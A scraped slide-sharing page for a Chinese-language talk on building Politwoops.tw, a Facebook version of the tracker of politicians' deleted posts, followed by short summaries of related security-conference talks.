Politwoops.tw

Jun 20, 20140 likes313 views

橘毛貓

tweet-collectortweet-collector 的成份的成份
資料來源
資料儲存
畫面截圖

運作方式運作方式
beanstalkd
MySQ
L
Tweepy
PhantomjsPhantomjs

看起來似乎只要把 Tweepy 換成
Facebook 用的，就可以解決了呢 !
圖片來源 : http://livedoor.blogimg.jp/nipi090/imgs/0/0/00d426ff.jpg

FB API 超難用
的
FB API 超難用
的
FB API 超難用
的
FB API 超難用
的

人家有的我沒有：人家有的我沒有： APIAPI 差異差異
? Twitter
? Twitter 沒有 edit 功能
? 有 deleted tweet 資訊， tweet 會提供 key(‘deleted’) 做為辨
識
? 提供 data streaming ( tweepy 提供 streamListener )
? Facebook
? Facebook 有 edit 功能，但無法從 feed 辨識
? 不提供 deleted feed 資訊
? 沒提供 data streaming
? Feed type 不明確 (API 只有分 photo, link, video, status 四
種 )
? ( 像是 like commit 也會出現在 feeds 裡面 , 但沒有直接的 link)

圖片來源 : http://img.sc115.com/uploads/allimg/101205/20101205124130188.jpg

圖片來源 : http://pic.pimg.tw/smilestupid/114114410851.jpg

總之完成了總之完成了 !!!!
? For Client:
? 實做 feed streaming 功能 & Listener.
? 實做 token_extend.
? For feeds-Worker:
? 實做 edited_feed update.
? 增加 normal user 特徵
? New feeds-Checker:
? 實做 normal users -> politicians.
? 實做 check feed accessible, deleted, re-check feed edited.
? For screenshot-Worker: (ly 說這個先跳過 XD)

Source Code?Source Code?
在 http://j.mp/politwoops
( 文件在 g0v’s hackpad)

This document discusses techniques for hooking and tracing program execution without a debugger. It introduces EhTrace, a tool that uses hardware exceptions to perform branch stepping on binaries. EhTrace sets CPU flags to single step and trace branches in a target process. Blockfighting techniques like page protection are discussed to maintain control during analysis. Coverage information like flame graphs can be generated from the trace data to visualize control flow. Future work includes tighter symbol support and additional "blockfighters" to handle CPU flag and page protection monitoring.

Csw2016 evron sysman_apt_reports_and_opsec_evolutionCanSecWest

This document summarizes a presentation about the evolution of advanced persistent threat (APT) actors and operations security (OPSEC). It discusses how the disclosure of APT1 by Mandiant in 2013 significantly disrupted operations and caused actors to adapt their techniques. Over time, actors have incorporated more off-the-shelf tools, constrained operations based on targets, and improved OPSEC in response to previous reports. The presentation also outlines a simplified attacker engagement process and discusses how defenders can respond by demanding more actionable information in APT reports.

Csw2016 julien moinard-hardsploitCanSecWest

Hardsploit is a framework and hardware device that allows security researchers to audit and pentest hardware devices like IoT systems. It functions as a bridge between hardware interfaces and software testing tools. The framework includes a programmable hardware board with 64 I/O channels that can communicate over various protocols to analyze components, dump memory, and exploit vulnerabilities found in hardware. The goal of Hardsploit is to advance the field of hardware security testing and evaluation.

Csw2016 gawlik bypassing_differentdefenseschemesCanSecWest

The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.

Csw2016 wang docker_escapetechnologyCanSecWest

This document summarizes Docker escape techniques. It begins with an overview of Docker and how it uses namespaces and control groups (cgroups) for isolation. It then discusses vulnerabilities in Docker from untrusted images and escaping namespaces to access the host or other containers. The main part describes the Docker escape technology, which involves getting a task structure handle, resetting its namespaces proxy to the initial namespace, and gaining root access on the host system by exploiting vulnerabilities or setting credentials. Example code is provided to switch the filesystem structure and namespace proxy to escape the container.

Csw2016 economou nissim-getting_physicalCanSecWest

This document discusses techniques for abusing the Intel paging mechanism on Windows to achieve arbitrary write capabilities despite modern kernel protections. It describes how the HAL's heap can be accessed from user mode by modifying page table entries, allowing kernel pointers to be leaked. It also explains how spraying process memory with fake page directories can cause physical memory exhaustion and potentially lead to arbitrary writes if a sprayed page is mapped. Live demos are promised for Windows and Linux attacks.

Csw2016 d antoine_automatic_exploitgenerationCanSecWest

The document discusses automated exploit generation through program analysis techniques. It introduces dynamic binary instrumentation, symbolic execution, and concolic execution as program analysis methods that can help automate finding the path to a vulnerability and generating an exploit. It provides examples of how these techniques work and common tools used like PIN, KLEE, Angr. The document concludes by discussing challenges like defining semantics of vulnerabilities precisely and the potential of program analysis to find more bugs through techniques like automated proving of program correctness.

Csw2016 song li-smart_warsCanSecWest

The document summarizes research into hacking the Kevo smart lock using a Bluetooth-enabled smartphone. The researcher was able to bind their phone to the Kevo fob and unlock the smart lock while the owner was asleep by taking advantage of the fob's brief window of continued radio transmission after being bound to another device. Potential fixes discussed include adding a button to the fob, using broadcasting instead of point-to-point Bluetooth mode, or requiring authentication through a smartphone app instead of the standalone fob. A demo video of the attack is referenced.

SQL injection duplicate error principlehackstuff

Sys Security橘毛貓

Csw2016 chen grassi-he-apple_graphics_is_compromisedCanSecWest

This document summarizes a presentation given by three security researchers from Tencent KEEN Security Lab at CanSecWest 2016 about compromising Apple graphics. They discuss fuzzing Apple's graphics drivers to find vulnerabilities by targeting interfaces that are reachable from the Safari sandbox. As a case study, they describe a race condition vulnerability they discovered in AppleIntelBDWGraphics that could lead to a double free and kernel code execution on macOS systems with Intel Broadwell graphics. They provide tips for making fuzzing more effective, such as targeting less restricted interfaces and leveraging relationships between different graphics interfaces and objects.

CSW2017 Harri hursti csw17 finalCanSecWest

Harri Hursti gave a presentation on security issues with electronic voting machines in the US. He discussed how independent security reviews of voting machines ended in 2007 and have not been conducted since, despite 52 models being used in the 2016 election. He provided examples of machines having network connections contrary to claims, such as a machine that transmitted results via modem. Hursti argued that more independent review of current voting machine security is needed given the issues uncovered in past research and real election incidents.

Rootkit 101hackstuff

Web2.0 attack and defencehackstuff

CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCanSecWest

The document discusses how threat actors often register spoofed domains to target organizations, and how analyzing domain registration patterns can provide strategic and tactical threat intelligence. It provides examples of analyzing spoofed domains targeting healthcare organizations to identify trends, and pivoting from domains used in attacks to find others associated with the same actors. The analysis of registration trends and WHOIS data on spoofed domains can help organizations monitor for potential threats and gain situational awareness during incidents.

Algo/Crypto about CTFhackstuff

Dvwa low levelhackstuff

This document provides an overview of common web vulnerabilities and techniques for exploiting them using a vulnerable web application called DVWA (Damn Vulnerable Web Application). It discusses low-level vulnerabilities like brute force attacks, command injection, CSRF, file inclusion and SQL injection. It then goes into more detail on different SQL injection techniques like concatenation, error-based detection, union queries, retrieving data from tables. It also covers blind SQL injection, file uploads, and both reflected and stored cross-site scripting vulnerabilities. The document appears to be an introduction or guide to using DVWA to learn about hacking web applications.

ROP 輕鬆談hackstuff

Android Security Developmenthackstuff

This document discusses various aspects of securing Android development including permissions, encryption, API management, and more. It addresses securing the USB, screen, clipboard, and databases. It recommends using Android NDK for cryptography to make analysis harder. API access should use randomly generated access tokens that are tied to the user ID and hardware ID and refreshed periodically. Encryption should be done with keys derived from random, hardware ID, and user-provided values.

新手无痛入门础辫办逆向hackstuff

Python 網頁爬蟲由淺入淺hackstuff

Android IPC MechanismLihan Chen

Android uses the Binder IPC mechanism for communication between processes. Binder allows for asynchronous remote procedure calls through a client-server model. It works by passing flat binder objects between processes using the binder driver in the kernel. Key aspects of Android IPC include Intents for asynchronous messaging, AIDL for synchronous RPCs across processes, and system services that are registered with the service manager.

CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest

The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.

CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest

The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.

础肠尘入门教程acm er

Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCanSecWest

The document discusses exploiting a vulnerability in Cisco ASA firewall devices. It begins with background on the target device and vulnerability, then outlines steps for getting access to the firmware, debugging the target, and identifying the vulnerability through static and dynamic analysis. The document then covers techniques for triggering the vulnerability and developing a controlled exploit to achieve remote code execution without user interaction.

Politwoops.tw

1. Politwoops .tw 我說錯了嘛我說錯了嘛

2. 先來說說原始的先來說說原始的 PolitwoopsPolitwoops

3. 前端画面长这样：前端画面长这样：

4. 實際組成是：實際組成是：前端後端

5. 預計做到這現在在這 !!

6. 了解架構才有辦法下手了解架構才有辦法下手所以來說說架構吧

7. tweet-collectortweet-collector 的成份的成份資料來源資料儲存畫面截圖

8. 運作方式運作方式 beanstalkd MySQ L Tweepy PhantomjsPhantomjs

9. 看起來似乎只要把 Tweepy 換成 Facebook 用的，就可以解決了呢 ! 圖片來源 : http://livedoor.blogimg.jp/nipi090/imgs/0/0/00d426ff.jpg

10. FB API 超難用的 FB API 超難用的 FB API 超難用的 FB API 超難用的

11. 人家有的我沒有：人家有的我沒有： APIAPI 差異差異 ? Twitter ? Twitter 沒有 edit 功能 ? 有 deleted tweet 資訊， tweet 會提供 key(‘deleted’) 做為辨識 ? 提供 data streaming ( tweepy 提供 streamListener ) ? Facebook ? Facebook 有 edit 功能，但無法從 feed 辨識 ? 不提供 deleted feed 資訊 ? 沒提供 data streaming ? Feed type 不明確 (API 只有分 photo, link, video, status 四種 ) ? ( 像是 like commit 也會出現在 feeds 裡面 , 但沒有直接的 link)

12. 圖片來源 : http://img.sc115.com/uploads/allimg/101205/20101205124130188.jpg

13. 圖片來源 : http://pic.pimg.tw/smilestupid/114114410851.jpg

14. 總之完成了總之完成了 !!!! ? For Client: ? 實做 feed streaming 功能 & Listener. ? 實做 token_extend. ? For feeds-Worker: ? 實做 edited_feed update. ? 增加 normal user 特徵 ? New feeds-Checker: ? 實做 normal users -> politicians. ? 實做 check feed accessible, deleted, re-check feed edited. ? For screenshot-Worker: (ly 說這個先跳過 XD)

15. 所以有了新的架构图所以有了新的架构图

16. 運作方式運作方式 beanstalkd MySQ L Streaming

17. Source Code?Source Code? 在 http://j.mp/politwoops ( 文件在 g0v’s hackpad)

18. DEMO TIME

狠狠撸

Politwoops.tw

Recommended

More Related Content

Viewers also liked (20)

Politwoops.tw